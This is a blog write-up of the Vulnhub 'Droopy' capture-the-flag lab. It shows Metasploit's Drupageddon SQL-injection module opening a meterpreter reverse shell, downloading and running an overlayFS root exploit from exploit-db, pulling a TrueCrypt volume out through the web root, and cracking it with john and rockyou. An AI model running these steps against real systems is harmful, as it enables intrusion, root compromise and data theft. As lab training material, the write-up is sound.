Vulnhub Droopy
Posted on 10 May 2016 in security • 5 min read
A few days ago, I installed a new pentesting box based on Arch Linux with Kali
in a virtual machine. In order to test it I select a light vulnbox on vulnhub : Droopy. There were two hints on the description of the machine on the vulnhub download page:
- Grab a copy of the rockyou wordlist.
- It's fun to read other people's email.
We will see how to use them in a moment :)
Discovery
Our nmap scan give us nothing but an open 80 port running a HTTP server. Let's give a look to the website:
Wappalyzer give use the precise version of the Drupal used (with the name and to logo of the VM it is easy to deduce that this is a Drupal machine). The version is Drupal 7.0 which is vulnerable to CVE-2014-3704 also called drupal_drupageddon.
Exploit
We use metasploit to directly have the Drupal exploit AND directly a meterpreter:
msf > search drupal
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
We set the RHOST to the VM's IP address
msf exploit(drupal_drupageddon) > set RHOST 10.0.2.4
We check our options
msf exploit(drupal_drupageddon) > show options
Module options (exploit/multi/http/drupal_drupageddon):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.0.2.4 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Drupal 7.0 - 7.31
We launch our exploit against the server and praise for a reverse shell: msf exploit(drupal_drupageddon) > exploit
Started reverse TCP handler on 10.0.2.15:4444
Testing page
Creating new user ULMihKJWdb:giXrJOFefa
Logging in as ULMihKJWdb:giXrJOFefa
Trying to parse enabled modules
Enabling the PHP filter module
Setting permissions for PHP filter module
Getting tokens from create new article page
Calling preview page. Exploit should trigger...
Sending stage (33721 bytes) to 10.0.2.4
Meterpreter session 2 opened (10.0.2.15:4444 -> 10.0.2.4:52349) at 2016-05-10 16:56:46 +0200
Second hint
Okay it works, we got a meterperter with the user www-data, let's follow the
hint a get a look to the e-mails:
meterpreter ls /var/mail
Listing: /var/mail
==================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 564 fil 2016-04-14 20:32:01 +0200 www-data
Let's read the e-mails of www-data:
From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN
George,
I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?
I'm sure you'll figure it out it won't rockyou too much!
If you are still struggling, remember that song by The Jam
Later,
Dave
Privilege escalation
We need a privilege escalation. Like for Fart-knocker We can use the CVE-2015-1328 exploiting overlayFS to get a root shell on the machine.
We spawn a shell:
meterpreter > shell
Process 1233 created.
Channel 1 created.
We still have the permissions of www-data:
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We download the exploit ofs.c:
wget https://www.exploit-db.com/download/37292
--2016-05-10 15:58:12-- https://www.exploit-db.com/download/37292
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: '37292'
0K ..... 100% 358M=0s
2016-05-10 15:58:12 (358 MB/s) - '37292' saved [5123/5123]
We rename the file:
mv 37292 ofs.c
We compile it and add execution permission:
gcc ofs.c -o ofs
chmod +x ofs
Then we just run it to gain root privileges on the box:
./ofs
collect2: error: ld returned 1 exit status
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
id
# uid=0(root) gid=0(root) groups=0(root),33(www-data)
Okay let us search for the flag:
ls /root/
# dave.tc
First hint
It seems we have a truecrypt volume, let's download it on our machine for more investigation:
cp /root/dave.tc /var/www/html/
Then we can download it directly from the server at http://10.0.2.4/dave.tc
We need to extract the hashes from the file to pass them to john, hopefully a tool exist just for that (we need to compile it):
http://article.gmane.org/gmane.comp.security.openwall.john.user/5320
As the mail mention the academy and the hint mention the rockyou password list, let us just extract the academy related passwords from it:
grep academy /media/sf_password_lists/rockyou.txt > /tmp/test
We launch john against the file with our partial rockyou list:
john dave.tc.john -w=/tmp/test
Warning: detected hash type "tc_aes_xts", but the string is also recognized as "tc_ripemd160"
Use the "--format=tc_ripemd160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (tc_aes_xts, TrueCrypt AES256_XTS [SHA512 128/128 AVX 2x /RIPEMD160/WHIRLPOOL])
Loaded hashes with cost 1 (hash algorithm [1:SHA512 2:RIPEMD160 3:Whirlpool]) varying from 1 to 3
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 54.22% (ETA: 17:16:27) 0g/s 59.89p/s 359.3c/s 359.3C/s fordacademy..ffmusicacademy
etonacademy (truecrypt_normal_volume)
1g 0:00:00:03 DONE (2016-05-10 17:16) 0.2724g/s 59.94p/s 331.8c/s 331.8C/s 06academy..!academy
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We mount the container using veracrypt:
veracrypt dave.tc -tc
Let us do a tree -a to see what file we have in this container:
.
├── buller
│ └── BullingdonCrest.jpg
├── lost+found [error opening dir]
├── panama
│ └── shares.jpg
└── .secret
├── piers.png
└── .top
└── flag.txt
5 directories, 4 files
Conclusion
Content of ./secret/.top/flag.txt
################################################################################
# ___ ___ _ _ ___ ___ _ _____ _ _ _ _ _____ ___ ___ _ _ ___ #
# / __/ _ \| \| |/ __| _ \ /_\_ _| | | | | /_\_ _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ | / / _ \| | | |_| | |__ / _ \| | | | (_) | .` |\__ \ #
# \___\___/|_|\_|\___|_|_\/_/ \_\_| \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
# #
################################################################################
Firstly, thanks for trying this VM. If you have rooted it, well done!
Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
--knightmare
It was a nice challenge, mainly for the beginner, probably a lack in the web part (or the use of metapsloit, spoil myself of some fun exploiting the SQL injection manually).
Thanks to knightmare for the VM and as always thanks to vulnhub !